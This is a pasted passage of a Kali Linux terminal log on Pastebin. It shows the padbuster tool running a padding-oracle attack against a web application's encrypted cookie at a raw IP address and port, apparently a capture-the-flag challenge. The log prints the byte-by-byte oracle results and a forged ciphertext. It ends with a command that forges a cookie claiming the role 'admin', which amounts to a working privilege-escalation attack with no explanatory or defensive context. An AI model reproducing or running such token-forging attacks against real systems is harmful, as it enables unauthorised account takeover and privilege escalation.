  711. INFO: No error string was provided...starting response analysis
  712.  
  713. *** Response Analysis Complete ***
  714.  
  715. The following response signatures were returned:
  716.  
  717. -------------------------------------------------------
  718. ID# Freq Status Length Location
  719. -------------------------------------------------------
  720. 1 1 302 0 login.php
  721. 2 ** 255 500 0 N/A
  722. -------------------------------------------------------
  723.  
  724. Enter an ID that matches the error condition
  725. NOTE: The ID# marked with ** is recommended : 2
  726.  
  727. Continuing test with selection 2
  728.  
  729. [+] Success: (97/256) [Byte 8]
  730. [+] Success: (155/256) [Byte 7]
  731. [+] Success: (87/256) [Byte 6]
  732. [+] Success: (153/256) [Byte 5]
  733. [+] Success: (61/256) [Byte 4]
  734. [+] Success: (188/256) [Byte 3]
  735. [+] Success: (151/256) [Byte 2]
  736. [+] Success: (167/256) [Byte 1]
  737.  
  738. Block 2 Results:
  739. [+] New Cipher Text (HEX): 300032a70da9649d
  740. [+] Intermediate Bytes (HEX): 516e42c663aa679e
  741.  
  742. [+] Success: (166/256) [Byte 8]
  743. [+] Success: (44/256) [Byte 7]
  744. [+] Success: (192/256) [Byte 6]
  745. [+] Success: (2/256) [Byte 5]
  746. [+] Success: (84/256) [Byte 4]
  747. [+] Success: (160/256) [Byte 3]
  748. [+] Success: (132/256) [Byte 2]
  749. [+] Success: (225/256) [Byte 1]
  750.  
  751. Block 1 Results:
  752. [+] New Cipher Text (HEX): 620803dbc031b933
  753. [+] Intermediate Bytes (HEX): 177b66a9fa43d65b
  754.  
  755. -------------------------------------------------------
  756. ** Finished ***
  757.  
  758. [+] Encrypted value is: YggD28AxuTMwADKnDalknQAAAAAAAAAA
  759. -------------------------------------------------------
  760.  
  761. root@kali:~/Downloads# ^C
  762. root@kali:~/Downloads# ^C
  763. root@kali:~/Downloads# ^C
  764. root@kali:~/Downloads# padbuster http://88.198.233.174:48126/profile.php v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D 8 -cookies iknowmag1k=v4DZcOHb%2BHgaQSFl9GElvWzNK3K%2BVtGfdamHMO0KWQ8IrK941jspX7yFnPnLuZhSP966GeTVm3w%3D -encoding 0 -plaintext {"user":"rohanpan","role":"admin"}^C
  765. root@kali:~/Downloads# ^C
  766. root@kali:~/Downloads# ^C
  767. root@kali:~/Downloads#
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!